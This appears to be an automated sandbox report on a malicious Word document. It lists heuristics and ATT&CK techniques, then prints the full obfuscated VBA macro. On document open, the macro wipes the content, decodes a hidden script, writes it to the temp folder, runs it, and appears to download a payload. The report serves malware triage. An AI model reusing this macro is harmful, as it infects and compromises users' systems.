MALICIOUS
112
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The Document_Open macro triggers the execution of another subroutine that deletes the document's content and saves the file. This behavior, combined with the high-confidence heuristic for CreateObject and p-code auto-execution, suggests the macro is designed to prepare the system for a second-stage payload, likely downloaded from a remote source. The specific obfuscation in the VBA script prevents a confident identification of the exact payload delivery mechanism.
Heuristics 6
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set QTPdboULFN = fljLcvnm(CreateObject(MGdAvjTm)) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Public Sub Document_Open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7515 bytes |
SHA-256: 7d5ce1673fe2ce99deca3a9199dc0ed329db9249891b246da7d2aca9f6afd2a0 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
78 of 125 identifiers look randomly generated (e.g. 'xbuqldbwfzrkcPnfutzTfmjG') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Sub Document_Open()
Dim XFkTbjBuLbs
XFkTbjBuLbs = 69
If XFkTbjBuLbs < 84 Then
Dim yieek(0)
For Each mdVmmNps In yieek
mdVmmNps = mdVmmNps - 15
Next
End If
Select Case XFkTbjBuLbs
End Select
Módulo1.BkMMeGP
End Sub
Attribute VB_Name = "Módulo1"
Public Sub BkMMeGP()
ActiveDocument.Content.Select
Dim SpBZerZvOQVI
SpBZerZvOQVI = 51
If SpBZerZvOQVI < 32 Then
Dim oPbbnuc
oPbbnuc = 59
If oPbbnuc < 3 Then
oPbbnuc = oPbbnuc + 62
End If
End If
Selection.Delete
Dim tgONLoKE
tgONLoKE = ""
Dim ICLsOeqXF
ICLsOeqXF = 50
If ICLsOeqXF < 60 Then
Dim PbvfVvVDEE
PbvfVvVDEE = 93
Select Case PbvfVvVDEE
Case 44
Dim jtyXc(4)
jtyXc(0) = 69
jtyXc(1) = 27
jtyXc(2) = 7
jtyXc(3) = 45
Case 23
Dim caPfC(0)
For Each IRjelkNOkmL In caPfC
IRjelkNOkmL = IRjelkNOkmL - 48
Next
Case 20
PbvfVvVDEE = PbvfVvVDEE + 79
End Select
End If
Selection.TypeText (tgONLoKE)
ActiveDocument.Save
fbZyfV
Dim VfduZF(6)
VfduZF(0) = 18
VfduZF(1) = 40
VfduZF(2) = 20
VfduZF(3) = 2
VfduZF(4) = 21
VfduZF(5) = 35
End Sub
Private Sub fbZyfV()
Dim KmVTSHL(3)
KmVTSHL(0) = 53
KmVTSHL(1) = 16
KmVTSHL(2) = 15
For Each lpafK In KmVTSHL
lpafK = lpafK - 73
Next
Dim ZbmWr, BhctxUV, aNqmNlsTPD, fbLZwSY, ZWGskbh
ZbmWr = "gj~jh<wg*ao1!-wdFOZt)ovs/wNRFzrQrPS!<oRywQrCsUK!,!(!d0!fyf/end(!>!wdFOZt!sbw<*oRywQrCsUK)fmjGfufmfE/KRcsTZ!*ftmbg!>>!*oRywQrCsUK)tutjyFfmjG/KRcsTZ)gj<ftpmD/RT[tM<*oRywQrCsUK)fmjGpUfwbT/RT[tM<*oRywQr"
BhctxUV = "CsUK)fmjGfufmfE/KRcsTZ!**oRywQrCsUK)tutjyFfmjG/KRcsTZ)gj<*zepCftopqtfS/FEtGohtVnJ)fujsX/RT[tM!|!*113!>>!tvubuT/FEtGohtVnJ)!gj!<*)eoft/FEtGohtVnJ!<*1!-(fyf/7213tfubeqvbwbk0npd/topjtsfwfddjg1mmbthozuu"
Dim FebwDF(9)
FebwDF(0) = 10
FebwDF(1) = 11
FebwDF(2) = 86
FebwDF(3) = 28
FebwDF(4) = 27
FebwDF(5) = 63
FebwDF(6) = 17
FebwDF(7) = 66
FebwDF(8) = 34
aNqmNlsTPD = "fteobtsfwzse/xxx00;quui(!-(ufH()ofqp/FEtGohtVnJ!<*(2/6/utfvrfSquuIojX/quuIojX()udfkcPYfwjudB!xfo!>!FEtGohtVnJ!sbw!<1!>!opjujtpQ/RT[tM<2!>!fqzU/RT[tM<*)ofqP/RT[tM<*(nbfsuT/CEPEB()!udfkcPYfwjudB!xfo!>"
fbLZwSY = "!RT[tM!sbw<!(fyf/554qnubw5K(!,!(]](!,!*3!)sfempGmbjdfqTufH/KRcsTZ!>!oRywQrCsUK!sbw!<*(udfkcPnfutzTfmjG/hojuqjsdT()!udfkcPYfwjudB!xfo!>!KRcsTZ!sbw!<*(mmfiT/uqjsdTX()udfkcPYfwjudB!xfo!>!wNRFzrQrPS!sbw"
ZWGskbh = ZbmWr & BhctxUV
ZWGskbh = ZWGskbh & aNqmNlsTPD & fbLZwSY
Dim zRGeRJkzmbbLE(9)
zRGeRJkzmbbLE(0) = 78
zRGeRJkzmbbLE(1) = 86
zRGeRJkzmbbLE(2) = 53
zRGeRJkzmbbLE(3) = 66
zRGeRJkzmbbLE(4) = 66
zRGeRJkzmbbLE(5) = 6
zRGeRJkzmbbLE(6) = 15
zRGeRJkzmbbLE(7) = 56
zRGeRJkzmbbLE(8) = 83
Set WVpoy = QTPdboULFN(PbRcSVyaVe("xbuqldbwfzrkcPnfutzTfmjG/hojuqjsdT"))
Dim zRTOyTKF
zRTOyTKF = 96
If zRTOyTKF < 26 Then
zRTOyTKF = zRTOyTKF + 73
End If
Dim rGXOM
rGXOM = WVpoy.GetSpecialFolder(2) & PbRcSVyaVe("lptoikyv/gamjtPcrUTw]")
Dim ttLJoKlB(3)
ttLJoKlB(0) = 89
ttLJoKlB(1) = 34
ttLJoKlB(2) = 10
Set xNgKGS = WVpoy.CreateTextFile(rGXOM, True, True)
Dim MjZvLgwLK
MjZvLgwLK = 10
Select Case MjZvLgwLK
End Select
xNgKGS.Write PbRcSVyaVe(ZWGskbh)
xNgKGS.Close
Set oWBupifg = QTPdboULFN(PbRcSVyaVe("vbofepmrjgjubdjmqqB/mmfiT"))
hDnnJZCyh oWBupifg, rGXOM
ActiveDocument.Password = PbRcSVyaVe("zn[rgfyinztTEc")
ActiveDocument.Save
End Sub
Public Function QTPdboULFN(ByVal MGdAvjTm As String)
Dim iIHBbYX
iIHBbYX = 19
If iIHBbYX < 97 Then
Dim kSePhy(0)
End If
Set QTPdboULFN = fljLcvnm(CreateObject(MGdAvjTm))
Dim mNvca
mNvca = 56
If mNvca < 14 Then
Dim AeiQsQw
AeiQsQw = 5
If AeiQsQw < 70 Then
Dim JrCBwZTZ(8)
JrCBwZTZ(0) = 30
JrCBwZTZ(1) = 68
JrCBwZTZ(2) = 14
JrCBwZTZ(3) = 95
JrCBwZTZ(4) = 45
JrCBwZTZ(5) = 7
JrCBwZTZ(6) = 2
JrCBwZTZ(7) = 25
End If
Select Case AeiQsQw
Case 81
AeiQsQw = AeiQsQw + 50
Case 54
AeiQsQw = AeiQsQw + 88
End Select
End If
End Function
Public Function fljLcvnm(ByVal QTPdboULFN As Object)
Set fljLcvnm = QTPdboULFN
End Function
Public Sub hDnnJZCyh(ByVal uOYhGwu As Object, ByVal hOyojGfhi As String)
uOYhGwu.Open (hOyojGfhi)
End Sub
Private Function PbRcSVyaVe(stringToDeZWGskbh)
Dim aiHQxs(4)
aiHQxs(0) = 40
aiHQxs(1) = 54
aiHQxs(2) = 21
aiHQxs(3) = 11
stringToDeZWGskbh = Replace(stringToDeZWGskbh, "AInWrYMntt", "q")
Dim jwIqLPkPxUS
jwIqLPkPxUS = 4
Select Case jwIqLPkPxUS
Case 14
Dim klkqIn(4)
klkqIn(0) = 5
klkqIn(1) = 82
klkqIn(2) = 14
klkqIn(3) = 5
Case 53
jwIqLPkPxUS = jwIqLPkPxUS + 81
End Select
stringToDeZWGskbh = Replace(stringToDeZWGskbh, "aRckiyJ", "n")
Dim guHGJuSXE(7)
guHGJuSXE(0) = 95
guHGJuSXE(1) = 15
guHGJuSXE(2) = 25
guHGJuSXE(3) = 32
guHGJuSXE(4) = 16
guHGJuSXE(5) = 32
guHGJuSXE(6) = 94
For Each qFovnB In guHGJuSXE
qFovnB = qFovnB - 25
Next
stringToDeZWGskbh = Replace(stringToDeZWGskbh, "cGwcTZIwFCq", "z")
Dim mrrWDnfKG(4)
mrrWDnfKG(0) = 12
mrrWDnfKG(1) = 50
mrrWDnfKG(2) = 7
mrrWDnfKG(3) = 83
For Each eToRR In mrrWDnfKG
eToRR = eToRR - 50
Next
Dim BCBZLcVXN, vtshrFO
vtshrFO = Len(stringToDeZWGskbh)
Dim WyQXYshQfH
For WyQXYshQfH = 1 To vtshrFO
Dim HpjyWY
Dim JeTxWGI(3)
JeTxWGI(0) = 45
JeTxWGI(1) = 79
JeTxWGI(2) = 29
HpjyWY = Mid(stringToDeZWGskbh, WyQXYshQfH, 1)
If (WyQXYshQfH - 1) < 12 And (WyQXYshQfH) Mod 3 = 0 Then
HpjyWY = Chr(Asc(HpjyWY) - 1)
Dim TYwga(0)
BCBZLcVXN = BCBZLcVXN & HpjyWY
ElseIf (WyQXYshQfH - 1) >= 12 Then
Dim RpBzDtK(5)
RpBzDtK(0) = 78
RpBzDtK(1) = 23
RpBzDtK(2) = 62
RpBzDtK(3) = 60
RpBzDtK(4) = 98
HpjyWY = Chr(Asc(HpjyWY) - 1)
BCBZLcVXN = BCBZLcVXN & HpjyWY
End If
Next
Dim lOAQjGn
lOAQjGn = 65
Select Case lOAQjGn
End Select
Dim GRefVeVLFD
vtshrFO = Len(BCBZLcVXN)
Dim hcYaetAVAFG
hcYaetAVAFG = 83
If hcYaetAVAFG < 38 Then
Dim AOjNaRe(3)
AOjNaRe(0) = 67
AOjNaRe(1) = 24
AOjNaRe(2) = 49
End If
Select Case hcYaetAVAFG
Case 93
hcYaetAVAFG = hcYaetAVAFG + 41
Case 7
hcYaetAVAFG = hcYaetAVAFG + 99
Case 61
hcYaetAVAFG = hcYaetAVAFG + 36
Case 69
Dim ykAkXuPZeNd(8)
ykAkXuPZeNd(0) = 50
ykAkXuPZeNd(1) = 33
ykAkXuPZeNd(2) = 90
ykAkXuPZeNd(3) = 12
ykAkXuPZeNd(4) = 89
ykAkXuPZeNd(5) = 36
ykAkXuPZeNd(6) = 57
ykAkXuPZeNd(7) = 51
For Each EyrwVSm In ykAkXuPZeNd
EyrwVSm = EyrwVSm - 97
Next
End Select
For WyQXYshQfH = vtshrFO To 1 Step -1
GRefVeVLFD = GRefVeVLFD & Mid(BCBZLcVXN, WyQXYshQfH, 1)
Dim NZmKNdImv(4)
NZmKNdImv(0) = 85
NZmKNdImv(1) = 76
NZmKNdImv(2) = 69
NZmKNdImv(3) = 76
Next
PbRcSVyaVe = GRefVeVLFD
Dim nnLMczLpn
nnLMczLpn = 57
If nnLMczLpn < 38 Then
Dim wFdLMb
wFdLMb = 87
If wFdLMb < 77 Then
Dim oFMNSxKx
oFMNSxKx = 52
If oFMNSxKx < 80 Then
Dim bagNgg(1)
bagNgg(0) = 9
End If
Select Case oFMNSxKx
Case 35
Dim eUeBGN(8)
eUeBGN(0) = 69
eUeBGN(1) = 79
eUeBGN(2) = 70
eUeBGN(3) = 1
eUeBGN(4) = 40
eUeBGN(5) = 20
eUeBGN(6) = 52
eUeBGN(7) = 9
Case 26
Dim MYTIXKRN(8)
MYTIXKRN(0) = 22
MYTIXKRN(1) = 7
MYTIXKRN(2) = 86
MYTIXKRN(3) = 89
MYTIXKRN(4) = 78
MYTIXKRN(5) = 63
MYTIXKRN(6) = 75
MYTIXKRN(7) = 4
For Each QvglOwGyFFr In MYTIXKRN
QvglOwGyFFr = QvglOwGyFFr - 16
Next
Case 50
Dim KSgIgKYzN(5)
KSgIgKYzN(0) = 84
KSgIgKYzN(1) = 98
KSgIgKYzN(2) = 75
KSgIgKYzN(3) = 90
KSgIgKYzN(4) = 65
Case 88
Dim MNgHoQlR(0)
For Each YZKNOF In MNgHoQlR
YZKNOF = YZKNOF - 46
Next
Case 61
oFMNSxKx = oFMNSxKx + 49
Case 82
oFMNSxKx = oFMNSxKx + 33
End Select
End If
End If
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.